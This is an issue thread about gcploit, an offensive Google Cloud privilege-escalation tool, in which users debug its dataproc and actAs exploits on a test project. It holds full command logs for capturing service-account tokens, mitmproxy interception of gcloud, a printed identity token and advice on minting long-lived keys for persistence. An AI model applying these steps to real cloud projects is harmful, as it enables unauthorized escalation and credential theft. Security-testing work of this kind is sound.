gcploit



Dataproc start guide?

I think a guide on how to use the dataproc exploit might be a great addition.

In the DEF CON talk, the dataproc exploit is started from an already captured service account. I'm wondering how one might do it from the base service account. When I try, I get the following errors:

root@gcptesting:~# gcploit --exploit dataproc --project ripthisproject

Running command:

gcloud auth print-identity-token

Running command:

gcloud dataproc clusters create vptgsggq --region us-central1 --scopes cloud-platform

error code Command '['gcloud', 'dataproc', 'clusters', 'create', 'vptgsggq', '--region', 'us-central1', '--scopes', 'cloud-platform']' returned non-zero exit status 1. b"ERROR: (gcloud.dataproc.clusters.create) INVALID_ARGUMENT: User not authorized to act as service account '[email protected]'. To act as a service account, user must have one of [Owner, Editor, Service Account Actor] roles. See https://cloud.google.com/iam/docs/understanding-service-accounts for additional details.\n"

Running command:

gcloud dataproc jobs submit pyspark --cluster vptgsggq dataproc_job.py --region us-central1

error code Command '['gcloud', 'dataproc', 'jobs', 'submit', 'pyspark', '--cluster', 'vptgsggq', 'dataproc_job.py', '--region', 'us-central1']' returned non-zero exit status 1. b'ERROR: (gcloud.dataproc.jobs.submit.pyspark) NOT_FOUND: Not found: Cluster projects/ripthisproject/regions/us-central1/clusters/vptgsggq\n'

Running command:

gcloud dataproc clusters delete vptgsggq --region us-central1 --quiet

error code Command '['gcloud', 'dataproc', 'clusters', 'delete', 'vptgsggq', '--region', 'us-central1', '--quiet']' returned non-zero exit status 1. b'ERROR: (gcloud.dataproc.clusters.delete) NOT_FOUND: Not found: Cluster projects/ripthisproject/regions/us-central1/clusters/vptgsggq\n'

False

Traceback (most recent call last):

File "main.py", line 184, in <module>

main()

File "main.py", line 180, in main

identity = dataproc(args.source, args.project)

File "main.py", line 81, in dataproc

for line in raw_output.split("\n"):

AttributeError: 'bool' object has no attribute 'split'
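The `False` printed just before the traceback suggests the command helper returns `False` on a non-zero exit, and `dataproc()` then calls `raw_output.split("\n")` on it. A minimal sketch of a helper that raises instead, so a failed `gcloud` call stops the exploit at the real error; `run_cmd`, `CommandFailed`, and `parse_lines` are hypothetical names, not gcploit's code.

```python
import subprocess


class CommandFailed(Exception):
    """Raised when a command exits non-zero (hypothetical exception type)."""

    def __init__(self, argv, returncode, stderr):
        super().__init__(f"{argv!r} exited with {returncode}: {stderr.strip()}")
        self.argv = argv
        self.returncode = returncode
        self.stderr = stderr


def run_cmd(argv):
    """Run a command and return its stdout as text, or raise CommandFailed.

    Never returning a bool means callers can always treat the result as str.
    """
    result = subprocess.run(argv, capture_output=True, text=True)
    if result.returncode != 0:
        raise CommandFailed(argv, result.returncode, result.stderr)
    return result.stdout


def parse_lines(raw_output):
    # Safe now: raw_output is guaranteed to be a str. Blank lines are skipped.
    return [line for line in raw_output.split("\n") if line.strip()]
```

With this shape, a caller wraps the cluster-create step in `try/except CommandFailed` and reports the `INVALID_ARGUMENT` message instead of running the job-submit and delete steps against a cluster that was never created.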

The base service account I'm using has only the Dataproc Admin role. It seems like the code is trying to use the default compute service account instead of the Dataproc Admin SA I created. When running the command locally I get the following:

root@gcptesting:~# gcloud dataproc clusters create vptgsggq --region us-central1 --scopes cloud-platform

ERROR: (gcloud.dataproc.clusters.create) INVALID_ARGUMENT: User not authorized to act as service account '[email protected]'. To act as a service account, user must have one of [Owner, Editor, Service Account Actor] roles. See https://cloud.google.com/iam/docs/understanding-service-accounts for additional details.

Also, the Cloud Resource Manager API needs to be enabled to list projects; I figured this out while testing on a new project.
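APIs can be enabled in one `gcloud services enable` call. A small sketch that builds that argv; the API list is an assumption drawn from this thread (Cloud Resource Manager for `projects list`, Dataproc, and Cloud Functions for the actAs exploit), not gcploit's documented requirements, and `enable_apis_cmd` is a hypothetical helper.

```python
from typing import List, Sequence

# Assumed from this thread, not an official requirements list.
REQUIRED_APIS = (
    "cloudresourcemanager.googleapis.com",
    "dataproc.googleapis.com",
    "cloudfunctions.googleapis.com",
)


def enable_apis_cmd(project: str, apis: Sequence[str] = REQUIRED_APIS) -> List[str]:
    """argv that enables every API in `apis` for `project` in a single call."""
    return ["gcloud", "services", "enable", *apis, f"--project={project}"]
```

Passing the result to `subprocess.run(..., check=True)` before the first exploit run avoids discovering a disabled API halfway through.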

Maybe you have to start with an Editor SA and then can move horizontally with a dataproc SA? Sorry if I am missing something.
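The error asks for `actAs` on the service account the cluster VMs would run as. Dataproc uses the Compute Engine default service account unless `--service-account` is passed, and the "Service Account Actor" role named in the error is deprecated in favor of Service Account User (`roles/iam.serviceAccountUser`), which carries `iam.serviceAccounts.actAs`. A sketch of the two gcloud invocations involved, assuming someone with permission to edit that SA's IAM policy (for example a project Owner) runs the grant; the helper names are hypothetical.

```python
from typing import List, Optional


def default_compute_sa(project_number: str) -> str:
    """Email of the Compute Engine default service account for a project."""
    return f"{project_number}-compute@developer.gserviceaccount.com"


def grant_act_as_cmd(target_sa: str, caller_sa: str, project: str) -> List[str]:
    """argv granting caller_sa roles/iam.serviceAccountUser on target_sa."""
    return [
        "gcloud", "iam", "service-accounts", "add-iam-policy-binding", target_sa,
        f"--member=serviceAccount:{caller_sa}",
        "--role=roles/iam.serviceAccountUser",
        f"--project={project}",
    ]


def create_cluster_cmd(name: str, project: str, region: str = "us-central1",
                       service_account: Optional[str] = None) -> List[str]:
    """The cluster-create call from the log, optionally with an explicit VM identity."""
    cmd = ["gcloud", "dataproc", "clusters", "create", name,
           "--region", region, "--scopes", "cloud-platform", "--project", project]
    if service_account:
        # Without this flag the cluster VMs run as the Compute Engine default SA.
        cmd += ["--service-account", service_account]
    return cmd
```

Either the grant makes the default SA usable, or `service_account=` points the cluster at an SA the caller can already act as.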

Hey Dan! Very recently Google has been making a lot of changes as a result of the talk. One of them is around Dataproc. I haven't had time to actually test the new changes. I was under the impression they wouldn't take effect for existing projects until 2021, but here's the full message from them:

Good to hear,

After running actAs first, I am now getting the following error:

[email protected]

refreshing cred

refreshing parent

Running command:

gcloud auth print-identity-token

Traceback (most recent call last):

File "main.py", line 184, in <module>

main()

File "main.py", line 180, in main

identity = dataproc(args.source, args.project)

File "main.py", line 77, in dataproc

run_cmd_on_source(source_name, "gcloud dataproc clusters create {} --region us-central1 --scopes cloud-platform".format(cluster_name), project)

File "main.py", line 123, in run_cmd_on_source

source.refresh_cred(db_session, base_cf.run_gcloud_command_local, dataproc)

File "/models.py", line 53, in refresh_cred

return self.refresh_cred(db_session, run_local)

TypeError: refresh_cred() missing 1 required positional argument: 'dataproc'

Maybe this was caused by these changes?

Haven't had much time to look deep into the error so I thought I'd bring it up. Love the work and the concept is so cool.

Hmm, that one looks like it's trying to create a dataproc cluster, which shouldn't happen if you're just using actAs. If some of your SAs were obtained via the dataproc exploit then it'll try to refresh those tokens through dataproc, but on a clean install it shouldn't do that. Try removing the db directory and starting again with just the base identity and actAs.

Yeah, all the commands I ran were failing on the missing dataproc positional argument, even gcploit --gcloud "projects list". I deleted the DB and ran the actAs exploit again, but I still get the following error:

name='fqsaxyqa', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='kpazbudz'

name='byujusfm', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='fzdltpnc'

name='rilzuecs', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='uzfootcy'

name='mqgeenlm', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='ziijyemu'

root@gcptesting:~# gcploit --gcloud "projects list" --source byujusfm

[email protected]

refreshing cred

refreshing parent

Running command:

gcloud auth print-identity-token

Traceback (most recent call last):

File "main.py", line 184, in <module>

main()

File "main.py", line 158, in main

return_output = run_cmd_on_source(args.source, args.gcloud_cmd, args.project)

File "main.py", line 123, in run_cmd_on_source

source.refresh_cred(db_session, base_cf.run_gcloud_command_local, dataproc)

File "/models.py", line 53, in refresh_cred

return self.refresh_cred(db_session, run_local)

TypeError: refresh_cred() missing 1 required positional argument: 'dataproc'

edit: the actas command runs fine when using the default compute engine account.

Ahh, that looks like a bug. I'll probably fix that later today. Thanks for testing it out!
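The traceback shows the recursive call in `models.py` as `self.refresh_cred(db_session, run_local)`, which drops the new `dataproc` argument. A minimal sketch of the intended recursion, assuming each credential keeps a reference to the identity used to obtain it; `Credential` and `refresh_count` are hypothetical stand-ins for the real model. Note that the line in the traceback recurses on `self`, not on a parent; if that is the real code, supplying the missing argument alone may just recurse forever, which would be consistent with the loop reported later in this thread.

```python
class Credential:
    """Hypothetical stand-in for the credential model in models.py."""

    def __init__(self, name, parent=None):
        self.name = name
        self.parent = parent      # identity used to obtain this one (None for the base)
        self.refresh_count = 0

    def refresh_cred(self, db_session, run_local, dataproc):
        # The parent must be fresh before it can mint a token for this identity.
        if self.parent is not None:
            # Forward every argument to the parent, not to self. Dropping
            # `dataproc` here is what raises the TypeError in the traceback.
            self.parent.refresh_cred(db_session, run_local, dataproc)
        # Placeholder for the real work (local gcloud, cloud function, or dataproc).
        self.refresh_count += 1
```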

No problem, looking forward to the fix!

I pushed a change that I think fixes it, but I haven't tested it. It'll take a bit for Docker Hub to rebuild.

Alright I'll give it some time and try it out.

Docker Hub is updated!

Will test now

Seems like it gets thrown into a loop:

name='kfalthzn', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='elraldty'

name='ohhgaebg', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='raifsggf'

name='ocuxvpca', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='xbccmiss'

root@gcptesting:~# gcploit --gcloud "projects list" --source ohhgaebg

[email protected]

refreshing cred

refreshing parent

Running command:

gcloud auth print-identity-token

[email protected]

refreshing cred

refreshing parent

Running command:

gcloud auth print-identity-token

[email protected]

refreshing cred

refreshing parent

Running command:

gcloud auth print-identity-token

[email protected]

refreshing cred

refreshing parent

Running command:

gcloud auth print-identity-token

[email protected]

refreshing cred

refreshing parent

Running command:

gcloud auth print-identity-token

[email protected]

refreshing cred

refreshing parent

Running command:

gcloud auth print-identity-token

[email protected]

refreshing cred

refreshing parent

Running command:

gcloud auth print-identity-token

[email protected]

refreshing cred

refreshing parent

I had to manually stop it

Okay I'll do a little more testing tonight and get it working.

Update: it loops whenever I run a command using the --source flag.

It also seems to be making duplicate db entries now:

name='kfalthzn', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='elraldty'

name='ohhgaebg', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='raifsggf'

name='ocuxvpca', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='xbccmiss'

name='vkjxpskt', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='brjpsofh'

name='ouhjjlpx', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='kopsktai'

name='knredewx', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='nndfetia'

Ohhh yup, that flag should work on everything that's not the base identity. The problem is that if it tries to refresh the base identity, it looks to the parent, which is itself.
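Since the base identity is its own parent, a refresh walk needs an explicit stopping rule. A minimal sketch, assuming identities link to their parent object; `Identity` and `refresh_order` are hypothetical. It walks parent links iteratively, stops at the base identity or at any node already visited, and returns the order in which tokens would be refreshed (root first).

```python
class Identity:
    """Hypothetical identity node; `parent` is the identity used to obtain it."""

    def __init__(self, name, parent=None):
        self.name = name
        # Model the base identity as its own parent, as described above.
        self.parent = parent if parent is not None else self

    def is_base(self):
        return self.parent is self


def refresh_order(identity):
    """Identities from the root down to `identity`, in the order to refresh them.

    Stops at the base identity or at any identity already seen, so neither a
    self-parent nor a longer cycle can cause an infinite loop.
    """
    chain = []
    seen = set()
    node = identity
    while node not in seen:
        seen.add(node)
        chain.append(node)
        if node.is_base():
            break
        node = node.parent
    chain.reverse()
    return chain
```

For a chain base, a, b, `refresh_order(b)` yields base, a, b; refreshing the base identity itself yields just `[base]` instead of recursing.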

Deduping is a problem I was too lazy to fix before launch :)
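The duplicate rows above repeat the same service accounts under new random names. One way to dedupe is to let SQLite enforce uniqueness on the identity itself. A sketch using the standard `sqlite3` module; the `identities` table and its columns are hypothetical, not gcploit's actual schema.

```python
import sqlite3


def open_store(path=":memory:"):
    conn = sqlite3.connect(path)
    # UNIQUE (service_account, project) makes the database reject a second row
    # for an identity that is already stored. Schema is hypothetical.
    conn.execute(
        """CREATE TABLE IF NOT EXISTS identities (
               name TEXT PRIMARY KEY,
               service_account TEXT NOT NULL,
               project TEXT NOT NULL,
               UNIQUE (service_account, project)
           )"""
    )
    return conn


def save_identity(conn, name, service_account, project):
    """Insert unless (service_account, project) exists; return the stored name."""
    conn.execute(
        "INSERT OR IGNORE INTO identities (name, service_account, project) "
        "VALUES (?, ?, ?)",
        (name, service_account, project),
    )
    conn.commit()
    row = conn.execute(
        "SELECT name FROM identities WHERE service_account = ? AND project = ?",
        (service_account, project),
    ).fetchone()
    return row[0]
```

Returning the existing name on a conflict lets a rerun of the actAs exploit reuse the stored identity instead of minting a new alias.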

I wasn't using the flag for the base identity though, I was using it for a captured one.

Oh odd. I'll take a look later today

If it's not clear, we very much shipped this in "MVP POC" state, less production code state

No worries!

I wasn't able to reproduce the infinite loop issue. I started with the following:

Two projects: bbs2, with a base identity that has project Editor, and another SA with an Editor role binding into bbs3.

I ran the actAs exploit on bbs2.

Then I ran this

gcploit --exploit actas --project bbs3-281722 --target_sa all --source qtclaxdc

And it didn't get stuck in an infinite loop

I was also able to run the dataproc command okay without actAs

gcploit --exploit dataproc --project bbs3-281722 --source qtclaxdc

Is there any more information you can share? Are you testing from an org? How old is the org?

I can try to get more info next time I get to my computer. There was no org; I was testing from a new GCP project with all the required APIs enabled.

I might be able to try testing from an org.




I also have been getting this warning when using the actas exploit:

WARNING: Setting IAM policy failed, try "gcloud alpha functions add-iam-policy-binding vmhvcvkc --member=allUsers --role=roles/cloudfunctions.invoker"

Here is the GCP activity log I am getting associated with it:

Other than that warning, I'm not getting the loop anymore after deleting the db folder. Weird.

If I could suggest a feature: a way to export the service account tokens, so one could do other things with them beyond what is built into the tool. Edit: eh, I guess it's not that hard to use the sqlite3 CLI to get them.
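The same export can be scripted with Python's standard `sqlite3` module instead of the CLI. A sketch that dumps rows to JSON; the `identities` table and the `service_account`/`access_token` columns are hypothetical placeholders, so check the real schema (for example with `.schema` in the sqlite3 CLI) and adjust the query.

```python
import json
import sqlite3


def export_tokens(db_path, out_path):
    """Dump stored tokens to a JSON file (table/column names are hypothetical)."""
    conn = sqlite3.connect(db_path)
    conn.row_factory = sqlite3.Row  # rows behave like mappings keyed by column
    try:
        rows = conn.execute(
            "SELECT service_account, access_token FROM identities"
        ).fetchall()
    finally:
        conn.close()
    records = [dict(row) for row in rows]
    with open(out_path, "w") as fh:
        json.dump(records, fh, indent=2)
    return records
```

Access tokens are short-lived (the job output in this thread reports `expires_in` of roughly an hour), so an export is only useful immediately after a refresh.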

Ah ok, another major bug. It seems like the dataproc worked the first time, but when I went to run commands afterward it kept just running the dataproc exploit again:

[email protected]

refreshing cred

Running command:

gcloud config set proxy/type http

Running command:

gcloud config set proxy/address 127.0.0.1

Running command:

gcloud config set proxy/port 19283

Running command:

gcloud config set core/custom_ca_certs_file /root/.mitmproxy/mitmproxy-ca.pem

Running command:

gcloud dataproc clusters create brxfdinx --region us-central1 --scopes cloud-platform --project ripthisproject

killing proxy

Running command:

gcloud config unset proxy/type

Running command:

gcloud config unset proxy/address

Running command:

gcloud config unset proxy/port

Running command:

gcloud config unset core/custom_ca_certs_file

[email protected]

refreshing cred

Running command:

gcloud config set proxy/type http

Running command:

gcloud config set proxy/address 127.0.0.1

Running command:

gcloud config set proxy/port 19283

Running command:

gcloud config set core/custom_ca_certs_file /root/.mitmproxy/mitmproxy-ca.pem

Running command:

gcloud dataproc jobs submit pyspark --cluster brxfdinx dataproc_job.py --region us-central1 --project ripthisproject

killing proxy

Running command:

gcloud config unset proxy/type

Running command:

gcloud config unset proxy/address

Running command:

gcloud config unset proxy/port

Running command:

gcloud config unset core/custom_ca_certs_file

[email protected]

refreshing cred

Running command:

gcloud config set proxy/type http

Running command:

gcloud config set proxy/address 127.0.0.1

Running command:

gcloud config set proxy/port 19283

Running command:

gcloud config set core/custom_ca_certs_file /root/.mitmproxy/mitmproxy-ca.pem

Running command:

gcloud dataproc clusters delete brxfdinx --region us-central1 --quiet --project ripthisproject

killing proxy

Running command:

gcloud config unset proxy/type

Running command:

gcloud config unset proxy/address

Running command:

gcloud config unset proxy/port

Running command:

gcloud config unset core/custom_ca_certs_file

Job [817b2e51250049ddaeee79bbe9a066f1] submitted.

Waiting for job output...

{"access_token": "", "token_type": "Bearer", "expires_in": 3525, "service_account": "[email protected]", "identity": "eyJhbGciOiJSUzI1NiIsImtpZCI6Ijc0NGY2MGU5ZmI1MTVhMmEwMWMxMWViZWIyMjg3MTI4NjA1NDA3MTEiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiIzMjU1NTk0MDU1OS5hcHBzLmdvb2dsZXVzZXJjb250ZW50LmNvbSIsImF6cCI6IjExMzIxNDk4ODQ5NjAwMjcyMjYyNCIsImV4cCI6MTU5Njk4MDUxOCwiaWF0IjoxNTk2OTc2OTE4LCJpc3MiOiJodHRwczovL2FjY291bnRzLmdvb2dsZS5jb20iLCJzdWIiOiIxMTMyMTQ5ODg0OTYwMDI3MjI2MjQifQ.QQsW2NAJLcyDu0Avm094_UAVE6CJxIYZ_SNSaHVrEHOi1Y5BrOpPhdaPdHn9taVEB5denAMfFmprfcrEZ_A-fCMozs_H_muAW5zEwPeax7gLPAAVzn0Io7FZBUlXQYnqPx3-5bDAu8hr35eWweCVEX382JlLdF47PcGhmWyWFzqlUxBG5dnw7sJ_nZLEaRku3WIdS1KW-VBPMqjgT02KMtPzyOemLgurfdv4KKlo0PCfgi4YKYPdjNjyaG266Ki2gsaLs4JAeNYM4XFtXZcjSKWZmNbCpGSRt39bVDUqAWtST62YE2Bw8MJxrKuroZsv6mG3f3UUrCHi9Me3QhPPQA"}

Job [817b2e51250049ddaeee79bbe9a066f1] finished successfully.

done: true
driverControlFilesUri: gs://dataproc-staging-us-central1-670974786012-vltockmf/google-cloud-dataproc-metainfo/19700c64-8e0c-4f73-bcf0-8c9770c66b44/jobs/817b2e51250049ddaeee79bbe9a066f1/
driverOutputResourceUri: gs://dataproc-staging-us-central1-670974786012-vltockmf/google-cloud-dataproc-metainfo/19700c64-8e0c-4f73-bcf0-8c9770c66b44/jobs/817b2e51250049ddaeee79bbe9a066f1/driveroutput
jobUuid: 86d5f2db-9f98-3dbf-88bf-865d2251464b
placement:
  clusterName: brxfdinx
  clusterUuid: 19700c64-8e0c-4f73-bcf0-8c9770c66b44
pysparkJob:
  mainPythonFileUri: gs://dataproc-staging-us-central1-670974786012-vltockmf/google-cloud-dataproc-metainfo/19700c64-8e0c-4f73-bcf0-8c9770c66b44/jobs/817b2e51250049ddaeee79bbe9a066f1/staging/dataproc_job.py
reference:
  jobId: 817b2e51250049ddaeee79bbe9a066f1
  projectId: ripthisproject
status:
  state: DONE
  stateStartTime: '2020-08-09T12:41:58.971Z'
statusHistory:
- state: PENDING
  stateStartTime: '2020-08-09T12:41:55.288Z'
- state: SETUP_DONE
  stateStartTime: '2020-08-09T12:41:55.340Z'
- details: Agent reported job success
  state: RUNNING
  stateStartTime: '2020-08-09T12:41:55.664Z'

root@gcptesting:~# gcploit --list

name='zxjkbdqj', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='gjverchm'

name='vmhvcvkc', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='hpfeiaas'

name='vbaagjls', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='ozxrnytf'

name='pvlypbgj', role='unknown', serviceAccount='[email protected]', project='ripthisproject', password='ftffmpay'

name='brxfdinx', role='editor', serviceAccount='[email protected]', project='ripthisproject', password='na'

root@gcptesting:~# gcploit --source brxfdinx --gcloud "projects list"

[email protected]

refreshing cred

Running command:

gcloud config set proxy/type http

Running command:

gcloud config set proxy/address 127.0.0.1

Running command:

gcloud config set proxy/port 19283

Running command:

gcloud config set core/custom_ca_certs_file /root/.mitmproxy/mitmproxy-ca.pem

Running command:

gcloud dataproc clusters create tutbykyz --region us-central1 --scopes cloud-platform --project ripthisproject

Edit: after the dataproc step finished, it also ran the projects list command. It also seems like it only does this when the source is the dataproc SA, so maybe that's by design? If so, the only issue I still run into is the warning I mentioned previously; otherwise everything started magically working.
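The log above shows each dataproc step wrapped in four `gcloud config set` calls that point gcloud at a local mitmproxy, followed by the matching `unset` calls after "killing proxy". A sketch of that set/unset pattern as a context manager, with the values copied from the log; `gcloud_through_proxy` is hypothetical and `run` is any callable that executes one argv list (a `subprocess.run` wrapper in practice). Putting the unsets in `finally` restores gcloud's config even if the wrapped command fails.

```python
from contextlib import contextmanager

# Values copied from the log above.
PROXY_SETTINGS = (
    ("proxy/type", "http"),
    ("proxy/address", "127.0.0.1"),
    ("proxy/port", "19283"),
    ("core/custom_ca_certs_file", "/root/.mitmproxy/mitmproxy-ca.pem"),
)


@contextmanager
def gcloud_through_proxy(run, settings=PROXY_SETTINGS):
    """Route gcloud through a local intercepting proxy for the duration of a block."""
    for key, value in settings:
        run(["gcloud", "config", "set", key, value])
    try:
        yield
    finally:
        # Always undo the config, even if the wrapped command raised.
        for key, _ in settings:
            run(["gcloud", "config", "unset", key])
```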

Okay, so a few things. The --member=allUsers binding above fails because Editor can't set an IAM policy on a cloud function. I thought I removed that flag; I'll double check. The way I get around that is that Editor does have the invoker permission, so the function doesn't need to allow anyone to trigger it: the caller has the permission itself.
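Without an `allUsers` binding, the function is called with the caller's own identity token, the kind printed by `gcloud auth print-identity-token` in the logs above. A sketch that builds (but does not send) such a request with the standard library; the `https://REGION-PROJECT.cloudfunctions.net/NAME` URL pattern is the one used by HTTP-triggered first-generation Cloud Functions, and the helper names and JSON body are assumptions.

```python
import urllib.request


def function_url(region, project, function_name):
    # Host pattern for HTTP-triggered (1st gen) Cloud Functions.
    return f"https://{region}-{project}.cloudfunctions.net/{function_name}"


def authenticated_request(url, identity_token, body=b"{}"):
    """Build a POST that authenticates as the caller instead of relying on allUsers."""
    return urllib.request.Request(
        url,
        data=body,
        method="POST",
        headers={
            "Authorization": f"Bearer {identity_token}",
            "Content-Type": "application/json",
        },
    )
```

Sending it is `urllib.request.urlopen(req)`; a 403 there would indicate the caller lacks the invoke permission after all.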

As for the dataproc exploit: yes, it only grabs the one identity. Since that identity is Editor, you just run the actAs exploit with it as the source to get the rest of the identities.
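In the `gcploit --list` output earlier in the thread, the identity captured by dataproc is the one with `role='editor'`. A sketch that parses that list format and builds the follow-up actAs command using flags that appear in this thread (`--exploit`, `--project`, `--target_sa`, `--source`); the parser assumes every field is a `key='value'` pair, as in the shown output, and both helpers are hypothetical.

```python
import re
from typing import Dict, List

# Matches key='value' pairs as printed by `gcploit --list` above.
_FIELD = re.compile(r"(\w+)='([^']*)'")


def parse_list_line(line: str) -> Dict[str, str]:
    """Parse one `gcploit --list` line into a dict of its fields."""
    return dict(_FIELD.findall(line))


def actas_from_editor(list_output: str, project: str) -> List[str]:
    """Build the actAs command sourced from the first identity marked 'editor'."""
    for line in list_output.splitlines():
        fields = parse_list_line(line)
        if fields.get("role") == "editor":
            return ["gcploit", "--exploit", "actas", "--project", project,
                    "--target_sa", "all", "--source", fields["name"]]
    raise LookupError("no identity with role='editor' in --list output")
```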

Yeah, from my testing it seems to add that --member flag automatically.


Oh, and yes, to answer your second question: it's a little hacky, but currently, to "refresh" its own credential, the dataproc identity spins up and tears down a new cluster every time. It's probably better to use the Editor permission to grant a long-lived token so it doesn't have to, though gcploit currently has no long-lived token support.

Yeah that’s exactly what I’ve been doing, I make a SA key immediately with the token.
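Creating a service account key is the usual way to turn a short-lived token into a long-lived credential. A sketch of the two standard gcloud commands involved, built as argv lists; `long_lived_key_cmds` and the default `key.json` path are hypothetical, and the caller is assumed to hold permission to create keys for that account, as reported in this thread. Keys stay valid until deleted, so they are also easier for defenders to spot and revoke.

```python
from typing import List


def long_lived_key_cmds(service_account: str, key_path: str = "key.json") -> List[List[str]]:
    """argv lists: create a key for `service_account`, then authenticate gcloud with it."""
    return [
        ["gcloud", "iam", "service-accounts", "keys", "create", key_path,
         f"--iam-account={service_account}"],
        ["gcloud", "auth", "activate-service-account", service_account,
         f"--key-file={key_path}"],
    ]
```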


Yeah so a hacky thing the code does right now is:

If cred A is used to get cred B, and cred B is used to get cred C:

Because they're all temporary credentials, when you try to use cred C it recursively refreshes all the way up to the parent. For cloud functions, we keep the cloud function around and just send a POST request to refresh, nice and fast, but for dataproc, because we don't want to keep the cluster up (it's expensive), it will spin the entire cluster up again when it's in the refresh chain.

The better thing to do would probably be to support, for each identity, both a refresh chain and a long-lived token option that doesn't refresh. That way, if we get the token creator permission, great; if we only have actAs, that's okay, we can still recurse, it'll just be slower.
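A sketch of that design, assuming each identity can hold an optional long-lived token and a `mint` callback that produces a fresh short-lived token from its parent's token (a cloud function POST or a dataproc job in gcploit's terms). The names are hypothetical, the chain is assumed acyclic, and the one-hour lifetime is an assumption based on the `expires_in` seen in the job output. A long-lived token short-circuits the chain, and unexpired tokens are reused so the expensive dataproc step only runs when actually needed.

```python
import time
from dataclasses import dataclass
from typing import Callable, List, Optional


@dataclass
class Identity:
    name: str
    parent: Optional["Identity"] = None
    # Mints a short-lived token for this identity given the parent's token.
    mint: Optional[Callable[[Optional[str]], str]] = None
    long_lived_token: Optional[str] = None  # e.g. obtained via a service account key
    token: Optional[str] = None
    expires_at: float = 0.0


def get_token(identity: Identity, now: Callable[[], float] = time.time,
              lifetime: float = 3600.0, trace: Optional[List[str]] = None) -> str:
    """Return a usable token, refreshing up the parent chain only when necessary."""
    if identity.long_lived_token is not None:
        return identity.long_lived_token          # no refresh chain at all
    if identity.token is not None and now() < identity.expires_at:
        return identity.token                     # cached short-lived token
    parent_token = None
    if identity.parent is not None:
        parent_token = get_token(identity.parent, now, lifetime, trace)
    if trace is not None:
        trace.append(identity.name)               # record which identities re-minted
    identity.token = identity.mint(parent_token)
    identity.expires_at = now() + lifetime
    return identity.token
```

Once an intermediate identity gains a long-lived token, everything above it drops out of the refresh path, which is what would keep a dataproc parent from spinning up a cluster on every use.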

Yeah that sounds pretty good!
